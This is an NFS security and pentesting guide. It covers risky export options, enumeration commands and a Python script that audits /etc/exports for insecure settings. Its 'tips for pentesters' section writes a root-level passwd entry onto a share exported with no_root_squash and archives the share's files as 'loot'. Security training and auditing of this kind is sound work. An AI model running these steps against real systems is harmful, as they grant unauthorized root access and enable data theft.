NFS
NFS Security & Exploitation Guide
1. About NFS
Network File System (NFS) is a distributed file system protocol originally developed by Sun Microsystems. Its purpose is to allow systems to:
Access remote file systems over a network as if they were local.
Provide file sharing primarily between Linux and Unix systems (not directly compatible with SMB).
Configuration File: /etc/exports defines which directories are shared and the permissions granted to clients.
Default Ports:
RPC portmapper: 111/TCP & UDP
NFS service: 2049/TCP & UDP
2. Dangerous NFS Export Settings
Some NFS configurations can be insecure and lead to privilege escalation or unauthorized access:
rw → Grants read & write permissions.
insecure → Allows connections from ports >1024 (less trusted).
nohide → Exports nested filesystems automatically.
no_root_squash → Critical risk: root users on clients retain root privileges on the NFS share (can create files owned by UID/GID 0).
Best Practice: Always avoid no_root_squash in production environments.
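One way to check an exports file for the four options above, as an added example that is not part of the original guide. The names `audit_exports` and `RISKY` and the sample file are illustrative and constructed; the code assumes unquoted paths and that a later option overrides an earlier one, including `-option` defaults placed after the path.

```python
# Added example: audit exports(5) text for the four options listed above.
# Each risky option maps to (option that cancels it, why it matters).
RISKY = {
    "rw": ("ro", "clients can write to the share"),
    "insecure": ("secure", "requests accepted from source ports above 1024"),
    "nohide": ("hide", "nested filesystems exposed through the parent export"),
    "no_root_squash": ("root_squash", "client root keeps UID/GID 0 (critical)"),
}
CANCELS = {safe: risky for risky, (safe, _) in RISKY.items()}

# Constructed sample, not taken from a real host.
SAMPLE = """\
# path          client(options)
/srv/nfs_share  *(rw,sync,no_root_squash)
/srv/docs       192.0.2.0/24(ro,sync,root_squash)
/srv/build      -rw,insecure build01(ro) \\
                build02(sync,nohide)
"""


def audit_exports(text):
    """Return (path, client, option, note) for every risky option in effect."""
    findings = []
    text = text.replace("\\\n", " ")  # join backslash-continued lines
    for raw in text.splitlines():
        fields = raw.split("#", 1)[0].split()  # drop comments, tokenize
        if not fields:
            continue
        path, defaults = fields[0], []
        for tok in fields[1:]:
            if tok.startswith("-"):  # "-opt,opt" sets defaults for later clients
                defaults = tok[1:].split(",")
                continue
            client, _, optstr = tok.partition("(")
            active = set()
            # Assumption: later options override earlier ones, so apply in order.
            for opt in defaults + optstr.rstrip(")").split(","):
                if opt in RISKY:
                    active.add(opt)
                elif opt in CANCELS:
                    active.discard(CANCELS[opt])
            for opt in sorted(active):
                # An entry with no host name applies to any client.
                findings.append((path, client or "*", opt, RISKY[opt][1]))
    return findings


if __name__ == "__main__":
    for path, client, opt, note in audit_exports(SAMPLE):
        print(f"{path:16} {client:10} {opt:15} {note}")
```

Run it against the contents of /etc/exports on the NFS server; an empty result means none of the four options is in effect for any client entry.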
3. Enumeration & Exploitation
Nmap Enumeration
Use Nmap NSE scripts to fingerprint NFS:
sudo nmap -sV -p111,2049 --script "nfs*" 192.0.2.15
Show Available NFS Shares
showmount -e 192.0.2.15
Example output:
Export list for 192.0.2.15:
/srv/nfs_share *
4. Mounting & Unmounting NFS Shares
Mount a Share
mkdir target-NFS
sudo mount -t nfs 192.0.2.15:/srv/nfs_share ./target-NFS/ -o nolock
Unmount a Share
sudo umount ./target-NFS
5. Tips & Tricks for Pentesters
Privilege Escalation via no_root_squash
If enabled, create a file owned by root on your local system, then copy it to the mounted share:
echo "hacked::0:0::/root:/bin/bash" > ./target-NFS/passwd
This could allow creation of root accounts if /etc/passwd is exported.
Recursive Share Search
Check for nested exports using findmnt or mounting multiple shares.
Quick Looting with tar
Instead of downloading files individually:
cd ./target-NFS
tar -cvf loot.tar *